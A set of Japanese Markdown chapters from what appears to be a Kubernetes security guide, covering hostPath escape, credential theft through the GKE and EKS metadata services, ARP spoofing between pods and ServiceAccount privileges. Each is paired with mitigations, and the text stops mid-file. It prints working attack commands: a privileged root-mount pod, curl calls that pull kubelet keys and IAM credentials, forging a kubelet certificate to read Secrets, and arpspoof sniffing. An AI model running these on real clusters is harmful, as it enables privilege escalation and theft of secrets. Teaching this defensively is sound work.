- https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
- https://etcd.io/
- https://kubernetes.io/docs/tasks/administer-cluster/configure-upgrade-etcd/#securing-etcd-clusters


================================================
FILE: source/kubernetes/security/hostpath-mount.md
================================================
# ホストパスのマウント

Pod からホストのパスをボリュームとしてマウントすることが可能です。例えば次のような Pod を作成すると `/host` 配下に Pod が配置された node のルートディレクトリをマウントできます。

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "tail", "-f", "/dev/null" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
```

```shell
$ kubectl exec -it noderootpod sh
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
/ # cd /host
/host # chroot .
root@lab-k8s-node-01:/#
root@lab-k8s-node-01:/# id
uid=0(root) gid=0(root) groups=0(root),10(uucp)
```

Pod の作成権限があるアカウント権限を攻撃者に奪われた場合に、権限昇格を行う方法としてこの手法が利用されることが考えられます。そのため、権限昇格を防ぐという目的で PodSecurityPolicy 等でマウント可能なディレクトリを明示的に定義すると良いでしょう。


================================================
FILE: source/kubernetes/security/metadata-service.md
================================================
# Metadata Service へのアクセス

GCP や AWS などのクラウドプロバイダーには Metadata Service と呼ばれるインスタンスに対して任意のデータを提供するエンドポイントがあり、インスタンスから http://169.254.169.254/ にアクセスすることで取得できます。  
GKE や EKS などのマネージド Kubernetes も例外ではなく、適切なアクセス制御を施さなければ Pod から Metadata Service にアクセスすることができ、権限昇格へとつながる可能性があります。  
ここでは GKE / EKS でこれらのエンドポイントにアクセスできた場合の攻撃例と対策を紹介します。

## GKE

GKE の Metadata Service に含まれる `kube-env` という Metadata にはノードをクラスタにジョインさせるために必要な bootstrap 処理に使用されるクレデンシャル(CA 証明書と公開,秘密鍵)が格納されています。  
これを利用して CertificateSigningRequest を作成することで kubelet のクライアント証明書を取得できます。さらに、その取得した証明書を使って kubelet として API サーバーにリクエストを送信することができてしまうのです。

これは GKE のコントロールプレーンとノードの認証方法に関するドキュメントに記載されています。[^1]

> Each node in the cluster is injected with a shared Secret at creation, which it can use to submit certificate signing requests to the cluster root CA and obtain kubelet client certificates. These certificates are then used by the kubelet to authenticate its requests to the API server. Note that this shared Secret is reachable by Pods, unless metadata concealment is enabled.

それでは実際に試していきます。GKE でクラスタを作成し、Pod に入ったあと、まずは Metadata へのアクセスを確認します。

```shell
root@test:/# KUBE_ENV_URL="http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env"
root@test:/# curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}"
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
AUTOSCALER_ENV_VARS: kube_reserved=cpu=60m,memory=960Mi,ephemeral-storage=5Gi;node_labels=beta.kubernetes.io/fluentd-ds-ready=true,cloud.google.com/gke-nodepool=default-pool,cloud.google.com/gke-os-distribution=cos
CA_CERT: LS0tLS1CRUdJ...S0tLS0tCg==
CLUSTER_IP_RANGE: 10.0.0.0/14
CLUSTER_NAME: sandbox-cluster
CNI_SHA1: dcbeba8d6be7a49e399bda6b8b638d312eace876
CNI_STORAGE_PATH: https://storage.googleapis.com/gke-release/cni-plugins/v0.8.5-gke.1
CNI_STORAGE_URL_BASE: https://storage.googleapis.com/gke-release/cni-plugins
CNI_TAR_PREFIX: cni-plugins-linux-amd64-
CNI_VERSION: v0.8.5-gke.1
CREATE_BOOTSTRAP_KUBECONFIG: "true"
DNS_DOMAIN: cluster.local
DNS_SERVER_IP: 10.3.240.10
DOCKER_REGISTRY_MIRROR_URL: https://mirror.gcr.io
ELASTICSEARCH_LOGGING_REPLICAS: "1"
ENABLE_CLUSTER_DNS: "true"
ENABLE_CLUSTER_LOGGING: "false"
ENABLE_CLUSTER_MONITORING: none
ENABLE_CLUSTER_REGISTRY: "false"
ENABLE_CLUSTER_UI: "true"
ENABLE_L7_LOADBALANCING: glbc
ENABLE_METADATA_AGENT: ""
ENABLE_METRICS_SERVER: "true"
ENABLE_NODE_LOGGING: "false"
ENABLE_NODE_PROBLEM_DETECTOR: standalone
ENABLE_NODELOCAL_DNS: "false"
ENABLE_SYSCTL_TUNING: "true"
ENV_TIMESTAMP: "2020-09-10T02:20:16+00:00"
EXTRA_DOCKER_OPTS: --insecure-registry 10.0.0.0/8
FEATURE_GATES: DynamicKubeletConfig=false,TaintBasedEvictions=false,RotateKubeletServerCertificate=true,ExperimentalCriticalPodAnnotation=true
FLUENTD_CONTAINER_RUNTIME_SERVICE: containerd
HEAPSTER_USE_NEW_STACKDRIVER_RESOURCES: "true"
HEAPSTER_USE_OLD_STACKDRIVER_RESOURCES: "false"
HPA_USE_REST_CLIENTS: "true"
INSTANCE_PREFIX: gke-sandbox-cluster-e2749290
KUBE_ADDON_REGISTRY: k8s.gcr.io
KUBE_CLUSTER_DNS: 10.3.240.10
KUBE_DOCKER_REGISTRY: gke.gcr.io
KUBE_MANIFESTS_TAR_HASH: d669659b3716794bafc85a1808d5def16e536166
KUBE_MANIFESTS_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-manifests.tar.gz
KUBE_PROXY_TOKEN: SrS1RF7V6Te5rd95FYvBhTEN04hWTKp2X4nMoxBrFgY=
KUBELET_ARGS: --v=2 --cloud-provider=gce --experimental-check-node-capabilities-before-mount=true
  --experimental-mounter-path=/home/kubernetes/containerized_mounter/mounter --cert-dir=/var/lib/kubelet/pki/
  --cni-bin-dir=/home/kubernetes/bin --kubeconfig=/var/lib/kubelet/kubeconfig --image-pull-progress-deadline=5m
  --experimental-kernel-memcg-notification=true --max-pods=110 --non-masquerade-cidr=0.0.0.0/0
  --network-plugin=kubenet --node-labels=beta.kubernetes.io/fluentd-ds-ready=true,cloud.google.com/gke-nodepool=default-pool,cloud.google.com/gke-os-distribution=cos
  --volume-plugin-dir=/home/kubernetes/flexvolume --bootstrap-kubeconfig=/var/lib/kubelet/bootstrap-kubeconfig
  --node-status-max-images=25 --registry-qps=10 --registry-burst=20
KUBELET_CERT: LS0tLS1CR...tLS0tCg==
KUBELET_KEY: LS0tLS1CRUdJT...tFWS0tLS0tCg==
KUBERNETES_MASTER: "false"
KUBERNETES_MASTER_NAME: 35.200.103.159
LOGGING_DESTINATION: ""
LOGGING_STACKDRIVER_RESOURCE_TYPES: ""
MONITORING_FLAG_SET: "true"
NETWORK_PROVIDER: kubenet
NODE_LOCAL_SSDS_EXT: ""
NODE_PROBLEM_DETECTOR_TOKEN: etn...zY=
NON_MASQUERADE_CIDR: 0.0.0.0/0
REMOUNT_VOLUME_PLUGIN_DIR: "true"
REQUIRE_METADATA_KUBELET_CONFIG_FILE: "true"
SALT_TAR_HASH: ""
SALT_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-salt.tar.gz
SERVER_BINARY_TAR_HASH: a016a715584cc797c4d9c2c3c8ae34d0fb3837db
SERVER_BINARY_TAR_URL: https://storage.googleapis.com/gke-release-asia/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz,https://storage.googleapis.com/gke-release/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz,https://storage.googleapis.com/gke-release-eu/kubernetes/release/v1.15.12-gke.2/kubernetes-server-linux-amd64.tar.gz
SERVICE_CLUSTER_IP_RANGE: 10.3.240.0/20
STACKDRIVER_ENDPOINT: https://logging.googleapis.com
SYSCTL_OVERRIDES: ""
VOLUME_PLUGIN_DIR: /home/kubernetes/flexvolume
ZONE: asia-northeast1-b
```

様々なデータが含まれていることが確認できます。ここに含まれている `CA_CERT` , `KUBELET_CERT` , `KUBELET_KEY` がそれぞれ証明書の生成に必要なファイルです。  
これらは base64 エンコードされているため、デコードして保存します。

```shell
root@test:/# curl -s -H "Metadata-flavor: Google" "${KUBE_ENV_URL}" | grep -v "EVICTION" | grep -v "KUBELET_TEST_ARGS" | grep -v "EXTRA_DOCKER_OPTS" | sed -e 's/: /=/g' > env
root@test:/# source ./env

root@test:/# echo $CA_CERT | base64 -d > bootstrap/ca.crt
root@test:/# echo $KUBELET_CERT | base64 -d > bootstrap/kubelet-bootstrap.crt
root@test:/# echo $KUBELET_KEY | base64 -d > bootstrap/kubelet-bootstrap.key
```

Pod が配置されている Node のホスト名も取得します。

```shell
root@test:/# KUBE_HOSTNAME_URL="http://169.254.169.254/computeMetadata/v1/instance/hostname"
root@test:/# CURRENT_HOSTNAME="$(curl -s -H 'Metadata-flavor: Google' ${KUBE_HOSTNAME_URL} | awk -F. '{print $1}')"
root@test:/# echo $CURRENT_HOSTNAME
gke-sandbox-cluster-default-pool-f9270e72-mg63
```

これからの操作を簡単にするために `kubectl` も取得しておきましょう。

```shell
root@test:/# curl -s -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
root@test:/# chmod +x kubectl
```

取得した証明書を使って Node のホスト名を含んだ CSR を作成します。

```shell
root@test:/tmp# cat openssl.cnf
[ req ]
prompt = no
encrypt_key = no
default_md = sha256
distinguished_name = dname
[ dname ]
O = system:nodes
CN = system:node:gke-sandbox-cluster-default-pool-f9270e72-mg63

root@test:/tmp# openssl ecparam -genkey -name prime256v1 -out kubelet.key
root@test:/tmp# openssl req -new -config /tmp/openssl.cnf -key kubelet.key -out kubelet.csr
```

CertificateSigningRequest リソースを作ります。 `request` には生成した CSR を base64 エンコードした値を指定します。

```shell
root@test:/tmp# cat kubelet.csr | base64 | tr -d '\n'
LS0tLS1CRUdJ...LS0tLS0K

root@test:/# cat /tmp/kubelet.yaml
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2
spec:
  groups:
  - system:authenticated
  request: LS0tLS1CRUdJ...LS0tLS0K
  usages:
  - digital signature
  - key encipherment
  - client auth
  username: kubelet
```

CertificateSigningRequest を作成すると kube-controoler-manager によって自動承認されます。[^2]

```shell
root@test:/# ./kubectl create -f /tmp/kubelet.yaml --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key
certificatesigningrequest.certificates.k8s.io/node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 created
```

証明書が承認されたので、クライアント証明書を取得します。

```shell
root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key get csr
NAME                                                        AGE   REQUESTOR                                                    CONDITION
csr-tsfx7                                                   37m   system:node:gke-sandbox-cluster-default-pool-f9270e72-mg63   Approved,Issued
node-csr-P4UgPH1KuYujxgQkDUWU1cWtUcMlEBXl5kn0WqUxS3Y        37m   kubelet                                                      Approved,Issued
node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2   66s   kubelet                                                      Approved,Issued

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=bootstrap/kubelet-bootstrap.crt --client-key=bootstrap/kubelet-bootstrap.key get csr node-csr-gke-sandbox-cluster-default-pool-f9270e72-mg63-2 -o jsonpath='{.status.certificate}' | base64 -d > /tmp/kubelet.crt
```

これで Pod の一覧と、その Pod で使われている Secret を閲覧できるようになります。Secret の一覧はできませんが、Get はできるので Pod で利用中の Secret は取得することが可能です。

```shell
root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get pods
NAME   READY   STATUS    RESTARTS   AGE
test   1/1     Running   0          40m

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get pods --all-namespaces -o=jsonpath='{range .items[*]}{.metadata.namespace}{"|"}{.metadata.name}{"|"}{.spec.volumes[*].secret.secretName}{"\n"}{end}'
default|test|default-token-xjxn2
kube-system|event-exporter-v0.3.0-5cd6ccb7f7-d6vnv|event-exporter-sa-token-t4jdk
kube-system|fluentd-gcp-scaler-6855f55bcc-kck48|fluentd-gcp-scaler-token-s767f
kube-system|fluentd-gcp-v3.1.1-zg5bc|fluentd-gcp-token-qlljh
kube-system|heapster-gke-858f6d47db-jmdm8|heapster-token-l47xx
kube-system|kube-dns-5c446b66bd-xbmn2|kube-dns-token-fx6l4
kube-system|kube-dns-autoscaler-6b7f784798-9q2mq|kube-dns-autoscaler-token-r5xl4
kube-system|kube-proxy-gke-sandbox-cluster-default-pool-f9270e72-mg63|
kube-system|l7-default-backend-84c9fcfbb-97tsn|default-token-psndk
kube-system|metrics-server-v0.3.3-fdc67d4b6-wglqz|metrics-server-token-d74js
kube-system|prometheus-to-sd-q7s2f|prometheus-to-sd-token-876dc
kube-system|stackdriver-metadata-agent-cluster-level-7df5d5fb48-v9l8w|metadata-agent-token-vnpdq

root@test:/# ./kubectl --certificate-authority=bootstrap/ca.crt --server=https://$KUBERNETES_MASTER_NAME --client-certificate=/tmp/kubelet.crt --client-key=/tmp/kubelet.key get secret -n kube-system prometheus-to-sd-token-876dc -o yaml
apiVersion: v1
data:
  ca.crt: LS0t...==
  namespace: a3ViZS1zeXN0ZW0=
  token: ZXlKXa...==
kind: Secret
metadata:
  annotations:
    kubernetes.io/service-account.name: prometheus-to-sd
    kubernetes.io/service-account.uid: c3ed5b36-685f-4f6e-93b9-4459a1a251d1
  creationTimestamp: "2020-09-10T02:23:40Z"
  name: prometheus-to-sd-token-876dc
  namespace: kube-system
  resourceVersion: "365"
  selfLink: /api/v1/namespaces/kube-system/secrets/prometheus-to-sd-token-876dc
  uid: 8651c53d-60d3-419c-877c-fef4e399e242
type: kubernetes.io/service-account-token
```

このように、もし Pod が侵害され、Metadata Service へのアクセスが可能だった場合は、Secret へのアクセスもできてしまうため、さらなる権限昇格が可能になります。  
GKE ではこのような攻撃を防ぐために Workload Identity[^3] や Shielded GKE Nodes[^4] という仕組みがありますので、これらを利用することを推奨します。

## EKS

続いて EKS での Metadata Service を見ていきます。AWS での Metadata Service は Amazon EC2 Instance metadata service (IMDS) という名前があるため、ここでも IMDS と表記します。  
まずは `eksctl` でクラスタを作成します。

```shell
$ eksctl create cluster --nodes 1 --name test-cluster --node-type t3.large
...
$ kubectl get nodes
NAME                                                STATUS   ROLES    AGE     VERSION
ip-192-168-74-107.ap-northeast-1.compute.internal   Ready    <none>   2m51s   v1.17.12-eks-7684af
```

クラスタができたら Pod を作成し、IMDS にアクセスしてみます。

```shell
$ kubectl run --image=nicolaka/netshoot:latest --rm -it test bash
If you don't see a command prompt, try pressing enter.
bash-5.0# curl http://169.254.169.254/latest/meta-data/
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
reservation-id
security-groups
```

GCP とはまた違ったデータが含まれていることが確認できます。このように、クラウドプロバイダーごとに格納されている値は異なるため、利用しているクラウドプロバイダーでどのような値を持っているかを確認し、もしアクセスされた場合にどのような影響が生じるのかを把握することをオススメします。

さて、これらのデータの中で攻撃に利用できるものの一つに Node のインスタンスに紐付いている IAM ロール IAM があります。今回作成したクラスタには `eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5` という名前の IAM ロールが付与されていることが確認できます。また、クレデンシャルも取得することもできます。

```shell
bash-5.0# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5

bash-5.0# curl http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-test-cluster-nodegroup-ng-NodeInstanceRole-1T2SSTC513WI5/
{
  "Code" : "Success",
  "LastUpdated" : "2020-11-23T13:32:29Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...6GVD",
  "SecretAccessKey" : "MgZ0...Rv1A",
  "Token" : "IQoJb3JpZ...QKjFmg==",
  "Expiration" : "2020-11-23T20:06:44Z"
}
```

この IAM ロールには以下のポリシーが適用されています。

- AmazonEKSWorkerNodePolicy
- AmazonEC2ContainerRegistryReadOnly
- AmazonEKS_CNI_Policy

このポリシーには `ec2:DescribeInstances` や `ec2:DescribeVpcs` などもあり、インスタンスやネットワーク情報の取得などが可能なことがわかります。  
さらに興味深いのは `AmazonEC2ContainerRegistryReadOnly` です。これは ECR から任意の Docker イメージを取得することができます。任意の Docker イメージを取得できるということはアプリケーションのソースコードなどを取得できるということになります。

では試してみましょう。Pod に `aws` コマンドをインストールし、 `aws ecr` コマンドを通してリポジトリの情報を取得できます。

```shell
root@test:~# export AWS_ACCESS_KEY_ID=ASIA...6GVD
root@test:~# export AWS_SECRET_ACCESS_KEY=MgZ0...Rv1A
root@test:~# export AWS_SESSION_TOKEN=IQoJb3JpZ...QKjFmg==

root@test:~# aws ecr describe-repositories
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-northeast-1:926292163423:repository/mrtc0/test",
            "registryId": "926292163423",
            "repositoryName": "mrtc0/test",
            "repositoryUri": "926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/mrtc0/test",
            "createdAt": "2020-11-23T22:51:31+09:00",
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

root@test:~# aws ecr list-images --repository-name mrtc0/test
{
    "imageIds": [
        {
            "imageDigest": "sha256:f9fc7e015619f2460609f17fe5903d698db775a340e4554c8a5b1c65d63b53b1",
            "imageTag": "latest"
        }
    ]
}
```

また、レジストリへのログインパスワードも取得できます。

```shell
root@test:~# aws ecr get-login-password --region ap-northeast-1
eyJwYXlsb2FkIjoiZlB4Qy9KdXFqajE5ZlRkektKZ1liaWlJW...

root@test:~# aws ecr get-login-password --region ap-northeast-1 | docker login --username AWS --password-stdin 926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/mrtc0/test
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
```

ログインができるのでイメージを取得してみます。`docker` コマンドを用意しなくても `curl` でイメージレイヤを取得することができます。

```shell
root@test:~# export TOKEN=$(aws ecr get-login-password --region ap-northeast-1)
root@test:~# curl -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/manifests/latest
{
   "schemaVersion": 2,
   "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
   "config": {
      "mediaType": "application/vnd.docker.container.image.v1+json",
      "size": 1728,
      "digest": "sha256:0a8054f3ec507e056e6bc0a015d3a85678e4966cd9e1f18953311676ddf681fd"
   },
   "layers": [
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 2797541,
         "digest": "sha256:df20fa9351a15782c64e6dddb2d4a6f50bf6d3688060a34c4014b0d9a752eb4c"
      },
      {
         "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "size": 117,
         "digest": "sha256:a34b0c316d63ed56e3cc1a312826765097c78c747445fad0e14d82686cb5563a"
      }
   ]
}

root@test:~# curl -L -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/blE_ID/  | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   127  100   127    0     0   2116      0 --:--:-- --:--:-- --:--:--  2116
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100  1728  100  1728    0     0  12083      0 --:--:-- --:--:-- --:--:-- 12083
{
  "architecture": "amd64",
  "config": {
    "Hostname": "",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sh"
    ],
    "ArgsEscaped": true,
    "Image": "sha256:a24bb4013296f61e89ba57005a7b3e52274d8edd3ae2077d04395f806b63d83e",
    "Volumes": null,
    "WorkingDir": "",
    "Entrypoint": null,
    "OnBuild": null,
    "Labels": null
  },
  "container_config": {
    "Hostname": "",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
    ],
    "Cmd": [
      "/bin/sh",
      "-c",
      "#(nop) ADD file:d579202c9c7308a756eac66a2b3be41424e5e92a6376dd3fcf059d57770aa10c in /secret.txt "
    ],
    "ArgsEscaped": true,
    "Image": "sha256:a24bb4013296f61e89ba57005a7b3e52274d8edd3ae2077d04395f806b63d83e",
    "Volumes": null,
    "WorkingDir": "",
    "Entrypoint": null,
    "OnBuild": null,
    "Labels": null
  },
  "created": "2020-11-23T13:50:04.0959713Z",
  "docker_version": "19.03.13",
  "history": [
    {
      "created": "2020-05-29T21:19:46.192045972Z",
      "created_by": "/bin/sh -c #(nop) ADD file:c92c248239f8c7b9b3c067650954815f391b7bcb09023f984972c082ace2a8d0 in / "
    },
    {
      "created": "2020-05-29T21:19:46.363518345Z",
      "created_by": "/bin/sh -c #(nop)  CMD [\"/bin/sh\"]",
      "empty_layer": true
    },
    {
      "created": "2020-11-23T13:50:04.0959713Z",
      "created_by": "/bin/sh -c #(nop) ADD file:d579202c9c7308a756eac66a2b3be41424e5e92a6376dd3fcf059d57770aa10c in /secret.txt "
    }
  ],
  "os": "linux",
  "rootfs": {
    "type": "layers",
    "diff_ids": [
      "sha256:50644c29ef5a27c9a40c393a73ece2479de78325cae7d762ef3cdc19bf42dd0a",
      "sha256:0e93ab7e92aa71e6ad2e6227fc001d8311e4c7827ef882bfe0fadffcfdf8b3e0"
    ]
  }
}

root@test:~# curl -L -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' -k --user AWS:$TOKEN https://926292163423.dkr.ecr.ap-northeast-1.amazonaws.com/v2/mrtc0/test/blobs/sha256:a34b0c316d63ed56e3cc1a312826765097c78c747445fad0e14d82686cb5563a -o layer.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100   117  100   117    0     0    873      0 --:--:-- --:--:-- --:--:--   873
root@test:~# tar xvzf layer.tar.gz
secret.txt
root@test:~# cat secret.txt
this is secret
```

EKS でもこのような攻撃を防ぐために hostNetwork を利用しないコンテナが IMDS に接続しないように設定できます。[^5]  
カスタム Launch template を使っているか、Self-managed かどうかなどで設定方法が変わってきますが、今回の場合だと `eksctl create nodegroup` でノードグループを作成する際に、 `--disable-pod-imds` フラグを付与することでアクセスを禁止することができます。  
禁止すると次のように 401 が返ってくるようになります。

```shell
bash-5.0# curl -i http://169.254.169.254/
HTTP/1.1 401 Unauthorized
Content-Length: 0
Date: Mon, 23 Nov 2020 14:50:10 GMT
Server: EC2ws
Connection: close
Content-Type: text/plain
```

---

[^1]: https://cloud.google.com/kubernetes-engine/docs/concepts/cluster-trust
[^2]: https://kubernetes.io/docs/reference/access-authn-authz/certificate-signing-requests/#kubernetes-signers
[^3]: https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
[^4]: https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes
[^5]: https://docs.aws.amazon.com/eks/latest/userguide/best-practices-security.html


================================================
FILE: source/kubernetes/security/privileged-pod.md
================================================
# Pod の権限と Node へのエスケープ

[ホストへのエスケープ](https://container-security.dev/security/breakout-to-host.html)でも紹介したように、特権コンテナはホスト側にエスケープすることが可能です。  
Kubernetes の場合は Pod がスケジュールされた Node にエスケープすることができます。

## SecurityContext

Docker ではコマンドラインオプションでコンテナの権限を設定できました。  
Kubernetes の Pod では SecurityContext を利用して Pod やコンテナに対して次のような設定が可能です。

- DAC ... 実行ユーザーや volume のグループを変更する
- SELinux ... SELinux の設定
- AppArmor ... AppArmor の設定
- 特権コンテナ ... 特権コンテナか非特権コンテナかの設定
- Linux Capabilities ... Capabilities の設定
- seccomp ... seccomp の設定
- AllowPrivilegeEscalation ... プロセスが追加の特権を取得できないようにする
- readOnlyRootFilesystem ... コンテナのルートファイルシステムを Read Only にする

それぞれの挙動の詳細についてはドキュメントを参照ください。

## Capabilities

コンテナへの過剰な Capability 不要は Breakout につながるものであると紹介しました。  
それでは Pod のデフォルトの Capabilities を確認してみましょう。

```shell
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
```

`pscap` コマンドで確認すると、いくつかの Capability が付与されていることが確認できます。  
この中でも興味深いのは `CAP_NET_RAW` です。これは Raw Socket を使うことができるため、 ARP Spoofing や DNS Spoofing を行うことができます。

## ARP Spoofing で Pod 間の通信を盗聴する

Raw Socket を扱えるため ARP Spoofing によって Pod 間の通信を盗聴することができます。  
では実際に試してみましょう。まず、サーバーとなる nginx Pod と、そこにアクセスする client Pod を作成します。

```shell
$ kubectl run --image=nginx:latest server
$ kubectl get pods -o wide
NAME       READY   STATUS    RESTARTS   AGE   IP            NODE       NOMINATED NODE   READINESS GATES
server     1/1     Running   0          15m   172.17.0.15   minikube   <none>           <none>

$ kubectl run --image=nicolaka/netshoot:latest --rm -it client -- bash -c 'while true; do curl http://172.17.0.15 ; sleep 5; done'

$ kubectl get pods -o wide
NAME       READY   STATUS    RESTARTS   AGE   IP            NODE       NOMINATED NODE   READINESS GATES
server     1/1     Running   0          3m   172.17.0.15   minikube   <none>           <none>
client     1/1     Running   0          2m30s   172.17.0.16   minikube   <none>           <none>
```

そして攻撃者用の Pod を作成し、 `arpspoof` コマンドで ARP Spoofing を実行します。  
同時に、 `tcpdump` で通信内容を確認します。

```shell
$ kubectl run --image=ubuntu:latest --rm -it attacker bash
root@attacker:/# apt update ; apt install -y dsniff tcpdump
root@attacker:/# arpspoof -t 172.17.0.16 172.17.0.15
```

```shell
$ kubectl exec -it attacker -- tcpdump -i any tcp -vv
    172.17.0.16.55080 > 172.17.0.15.80: Flags [P.], cksum 0x58b3 (incorrect -> 0x96e4), seq 0:75, ack 1, win 502, options [nop,nop,TS val 910579351 ecr 3251193240], length 75: HTTP, length: 75
        GET / HTTP/1.1
        Host: 172.17.0.15
        User-Agent: curl/7.71.1
        Accept: */*
```

このように通信内容を取得することができました。

## DNS Spoofing

TBD


================================================
FILE: source/kubernetes/security/service-account.md
================================================
# ServiceAccount には最小権限を与える

ServiceAccount のトークンと証明書は Pod 内の `/var/run/secrets/kubernetes.io/serviceaccounts/` 配下にマウントされます。  
そのため、Pod が侵害された場合には、攻撃者はマウントされた ServiceAccount の権限でリソースの操作が可能になります。ですので、ServiceAccount への権限付与は最小権限の原則に則り、必要な権限のみを付与することを推奨します。

Pod にマウントする ServiceAccount を明示していない場合は、 `default` ServiceAccount のトークンがマウントされますが、権限が付与されていないため、ほぼ何もできません。

```shell
bash-5.0# cd /var/run/secrets/kubernetes.io/serviceaccount/ bash-5.0# ls
ca.crt     namespace  token

bash-5.0# KUBE_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
bash-5.0# curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" \
  https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/api/v1/namespaces/default/pods/$HOSTNAME
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {

  },
  "status": "Failure",
  "message": "pods \"test\" is forbidden: User \"system:serviceaccount:lab:default\" cannot get resource \"pods\" in API group \"\" in the namespace \"default\"",
  "reason": "Forbidden",
  "details": {
    "name": "test",
    "kind": "pods"
  },
  "code": 403
}
```

自身が利用可能なアクションを知る API を利用して Pod を `get` できないことが確認できます。

```shell
curl -sSk -H "Authorization: Bearer $KUBE_TOKEN" \
     -d @- \
     -H "Content-Type: application/json" \
     -H 'Accept: application/json, */*' \
     -XPOST https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_PORT_443_TCP_PORT/apis/authorization.k8s.io/v1/selfsubjectaccessreviews <<'EOF'
{
   "kind":"SelfSubjectAccessReview",
   "apiVersion":"authorization.k8s.io/v1",
   "metadata":{
      "creationTimestamp":null
   },
